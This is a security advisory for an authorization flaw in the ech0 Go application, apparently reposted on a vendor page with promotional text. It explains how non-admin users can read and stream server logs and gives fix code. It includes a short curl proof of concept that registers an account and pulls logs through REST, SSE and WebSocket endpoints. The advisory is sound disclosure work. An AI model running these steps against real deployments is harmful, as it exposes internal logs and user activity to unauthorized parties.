Summary
The system log endpoints (GET /api/system/logs, GET /api/system/logs/stream, WS /ws/system/logs) lack authorization checks, allowing any authenticated non-admin user to read and stream all server logs. These logs contain error stack traces, internal file paths, module names, and arbitrary structured fields that facilitate reconnaissance for further attacks.
Details
The dashboard routes in internal/router/dashboard.go:7-8 register log endpoints on the AuthRouterGroup without any RequireScopes middleware:
// internal/router/dashboard.go
func setupDashboardRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {
appRouterGroup.AuthRouterGroup.GET("/system/logs", h.DashboardHandler.GetSystemLogs())
appRouterGroup.AuthRouterGroup.GET("/system/logs/stream", h.DashboardHandler.SSESubscribeSystemLogs())
appRouterGroup.WSRouterGroup.GET("/system/logs", h.DashboardHandler.WSSubscribeSystemLogs())
}
Compare with other admin-only routes that properly use RequireScopes:
// internal/router/setting.go, every route has RequireScopes
appRouterGroup.AuthRouterGroup.GET("/settings",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.SettingHandler.GetSiteSettings())
The AuthRouterGroup only applies JWTAuthMiddleware() (router.go:36), which validates the JWT and sets the viewer context but does not check admin status. The WSRouterGroup (router.go:37) has no middleware at all, the WebSocket handler only calls ParseToken to verify the JWT signature (dashboard.go:74) without any role/scope validation.
The handler (internal/handler/dashboard/dashboard.go:29-62) and service (internal/service/dashboard/dashboard.go:21-27) contain zero authorization checks. Other services in the codebase properly enforce admin access:
internal/service/inbox/inbox.go:132,ensureAdmin()internal/service/migrator/migrator.go:360,ensureAdmin()internal/service/comment/comment.go:719,requireAdmin()
Non-admin users are created with IsAdmin: false and IsOwner: false (internal/service/user/user.go:220-221) via the public registration endpoint.
The LogEntry struct (internal/util/log/log.go:78-87) exposes:
type LogEntry struct {
Time string `json:"time"`
Level string `json:"level"`
Msg string `json:"msg"`
Module string `json:"module,omitempty"`
Caller string `json:"caller,omitempty"` // internal file paths
Error string `json:"error,omitempty"` // error stack traces
Fields map[string]any `json:"fields,omitempty"` // arbitrary structured data
Raw string `json:"raw,omitempty"` // raw log lines
}
PoC
# 1. Register a non-admin user (system allows up to 5 users by default)
curl -X POST http://localhost:8080/api/register \
-H 'Content-Type: application/json' \
-d '{"username":"attacker","password":"Password123"}'
# 2. Login to get session token
TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
-H 'Content-Type: application/json' \
-d '{"username":"attacker","password":"Password123"}' | jq -r '.data.token')
# 3. Read system logs, should require admin but doesn't
curl http://localhost:8080/api/system/logs \
-H "Authorization: Bearer $TOKEN"
# Returns: {"code":1,"data":[{"time":"...","level":"error","msg":"...","module":"...","caller":"internal/service/user/user.go:145","error":"...","fields":{...}},...]}
# 4. Subscribe to real-time log stream via SSE
curl -N "http://localhost:8080/api/system/logs/stream?token=$TOKEN"
# 5. Subscribe via WebSocket (WSRouterGroup has NO middleware)
# wscat -c "ws://localhost:8080/ws/system/logs?token=$TOKEN"
Impact
Any registered non-admin user can:
- Read all historical system logs including error traces that reveal internal code paths, database errors, and application state
- Stream real-time logs via SSE or WebSocket to monitor all server activity as it happens
- Gather reconnaissance data, caller fields expose internal file paths and line numbers, error fields expose stack traces and database query failures, module fields map the internal architecture
- Monitor other users' actions, authentication failures, registration events, and admin operations appear in logs
This information disclosure lowers the bar for chaining further attacks by revealing the application's internal structure, error handling patterns, and operational state.
The application does not perform an authorization check before performing a sensitive operation. Typical impact: unauthorized access to restricted functionality or data.
GHSA-W8JJ-CWMC-WGQ2 has a CVSS score of 4.3 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.4.3); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Add RequireScopes middleware with an admin scope to the dashboard routes:
// internal/router/dashboard.go
func setupDashboardRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {
appRouterGroup.AuthRouterGroup.GET("/system/logs",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.DashboardHandler.GetSystemLogs())
appRouterGroup.AuthRouterGroup.GET("/system/logs/stream",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.DashboardHandler.SSESubscribeSystemLogs())
appRouterGroup.WSRouterGroup.GET("/system/logs",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.DashboardHandler.WSSubscribeSystemLogs())
}
Additionally, the WebSocket handler should validate admin scope after parsing the token, since the WSRouterGroup lacks middleware:
// internal/handler/dashboard/dashboard.go, WSSubscribeSystemLogs
claims, err := jwtUtil.ParseToken(token)
if err != nil {
ctx.AbortWithStatusJSON(http.StatusUnauthorized, gin.H{"msg": "invalid token"})
return
}
// Add admin check for WebSocket endpoint
if claims.TokenType == authModel.TokenTypeAccess && !containsScope(claims.Scopes, authModel.ScopeAdminSettings) {
ctx.AbortWithStatusJSON(http.StatusForbidden, gin.H{"msg": "admin access required"})
return
}
Frequently Asked Questions
- What is GHSA-W8JJ-CWMC-WGQ2? GHSA-W8JJ-CWMC-WGQ2 is a medium-severity missing authorization vulnerability in github.com/lin-snow/ech0 (go), affecting versions < 4.4.3. It is fixed in 4.4.3. The application does not perform an authorization check before performing a sensitive operation.
- How severe is GHSA-W8JJ-CWMC-WGQ2? GHSA-W8JJ-CWMC-WGQ2 has a CVSS score of 4.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/lin-snow/ech0 are affected by GHSA-W8JJ-CWMC-WGQ2? github.com/lin-snow/ech0 (go) versions < 4.4.3 is affected.
- Is there a fix for GHSA-W8JJ-CWMC-WGQ2? Yes. GHSA-W8JJ-CWMC-WGQ2 is fixed in 4.4.3. Upgrade to this version or later.
- Is GHSA-W8JJ-CWMC-WGQ2 exploitable, and should I be worried? Whether GHSA-W8JJ-CWMC-WGQ2 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-W8JJ-CWMC-WGQ2 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-W8JJ-CWMC-WGQ2? Upgrade
github.com/lin-snow/ech0to 4.4.3 or later.